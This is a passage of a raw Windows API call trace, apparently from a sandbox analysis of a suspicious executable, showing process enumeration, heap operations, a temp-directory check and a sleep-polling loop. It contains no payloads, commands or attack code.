th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0297.589] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0297.590] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0297.591] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0297.592] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0297.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0297.593] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0297.594] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0297.595] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0297.596] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0297.597] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.598] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0297.599] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.600] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0297.601] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0297.602] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0297.603] CloseHandle (hObject=0x294) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0297.603] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0297.603] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.604] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0297.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0297.604] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0297.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0297.605] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0297.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0297.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0297.606] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.606] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0297.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0297.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0297.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0297.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0297.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0297.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0297.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0297.607] timeGetTime () returned 0x4a5fd [0297.607] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.607] Sleep (dwMilliseconds=0xa) [0297.617] timeGetTime () returned 0x4a60d [0297.617] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.617] Sleep (dwMilliseconds=0xa) [0297.633] timeGetTime () returned 0x4a61d [0297.633] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.633] Sleep (dwMilliseconds=0xa) [0297.648] timeGetTime () returned 0x4a62c [0297.648] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.648] Sleep (dwMilliseconds=0xa) [0297.664] timeGetTime () returned 0x4a63c [0297.664] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.664] Sleep (dwMilliseconds=0xa) [0297.693] timeGetTime () returned 0x4a64b [0297.693] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.693] Sleep (dwMilliseconds=0xa) [0297.695] timeGetTime () returned 0x4a65b [0297.695] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.695] Sleep (dwMilliseconds=0xa) [0297.711] timeGetTime () returned 0x4a66b [0297.711] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.711] Sleep (dwMilliseconds=0xa) [0297.726] timeGetTime () returned 0x4a67a [0297.726] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.727] Sleep (dwMilliseconds=0xa) [0297.742] timeGetTime () returned 0x4a68a [0297.742] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.742] Sleep (dwMilliseconds=0xa) [0297.758] timeGetTime () returned 0x4a699 [0297.758] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.758] Sleep (dwMilliseconds=0xa) [0297.773] timeGetTime () returned 0x4a6a9 [0297.773] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.773] Sleep (dwMilliseconds=0xa) [0297.789] timeGetTime () returned 0x4a6b9 [0297.789] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.789] Sleep (dwMilliseconds=0xa) [0297.805] timeGetTime () returned 0x4a6c8 [0297.805] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.805] Sleep (dwMilliseconds=0xa) [0297.820] timeGetTime () returned 0x4a6d8 [0297.820] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.820] Sleep (dwMilliseconds=0xa) [0297.840] timeGetTime () returned 0x4a6e7 [0297.840] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.840] Sleep (dwMilliseconds=0xa) [0297.851] timeGetTime () returned 0x4a6f7 [0297.851] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.851] Sleep (dwMilliseconds=0xa) [0297.867] timeGetTime () returned 0x4a707 [0297.867] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.867] Sleep (dwMilliseconds=0xa) [0297.882] timeGetTime () returned 0x4a716 [0297.883] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.883] Sleep (dwMilliseconds=0xa) [0297.898] timeGetTime () returned 0x4a726 [0297.898] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.898] Sleep (dwMilliseconds=0xa) [0297.914] timeGetTime () returned 0x4a735 [0297.914] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.914] Sleep (dwMilliseconds=0xa) [0297.929] timeGetTime () returned 0x4a745 [0297.929] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.929] Sleep (dwMilliseconds=0xa) [0297.945] timeGetTime () returned 0x4a755 [0297.945] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.945] Sleep (dwMilliseconds=0xa) [0297.965] timeGetTime () returned 0x4a764 [0297.965] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.965] Sleep (dwMilliseconds=0xa) [0297.976] timeGetTime () returned 0x4a774 [0297.976] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.976] Sleep (dwMilliseconds=0xa) [0297.991] timeGetTime () returned 0x4a783 [0297.992] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0297.992] Sleep (dwMilliseconds=0xa) [0298.007] timeGetTime () returned 0x4a793 [0298.007] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.007] Sleep (dwMilliseconds=0xa) [0298.029] timeGetTime () returned 0x4a7a3 [0298.029] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.029] Sleep (dwMilliseconds=0xa) [0298.039] timeGetTime () returned 0x4a7b2 [0298.039] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.039] Sleep (dwMilliseconds=0xa) [0298.054] timeGetTime () returned 0x4a7c2 [0298.054] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.054] Sleep (dwMilliseconds=0xa) [0298.070] timeGetTime () returned 0x4a7d1 [0298.070] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.070] Sleep (dwMilliseconds=0xa) [0298.090] timeGetTime () returned 0x4a7e1 [0298.090] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.090] Sleep (dwMilliseconds=0xa) [0298.101] timeGetTime () returned 0x4a7f1 [0298.101] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.101] Sleep (dwMilliseconds=0xa) [0298.116] timeGetTime () returned 0x4a800 [0298.116] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.116] Sleep (dwMilliseconds=0xa) [0298.132] timeGetTime () returned 0x4a810 [0298.132] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.132] Sleep (dwMilliseconds=0xa) [0298.148] timeGetTime () returned 0x4a81f [0298.148] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.148] Sleep (dwMilliseconds=0xa) [0298.163] timeGetTime () returned 0x4a82f [0298.163] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.163] Sleep (dwMilliseconds=0xa) [0298.179] timeGetTime () returned 0x4a83f [0298.179] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.179] Sleep (dwMilliseconds=0xa) [0298.194] timeGetTime () returned 0x4a84e [0298.194] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.194] Sleep (dwMilliseconds=0xa) [0298.210] timeGetTime () returned 0x4a85e [0298.210] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.210] Sleep (dwMilliseconds=0xa) [0298.225] timeGetTime () returned 0x4a86d [0298.226] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.226] Sleep (dwMilliseconds=0xa) [0298.241] timeGetTime () returned 0x4a87d [0298.241] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.241] Sleep (dwMilliseconds=0xa) [0298.257] timeGetTime () returned 0x4a88d [0298.257] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0298.257] Sleep (dwMilliseconds=0xa) [0298.272] timeGetTime () returned 0x4a89c [0298.272] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 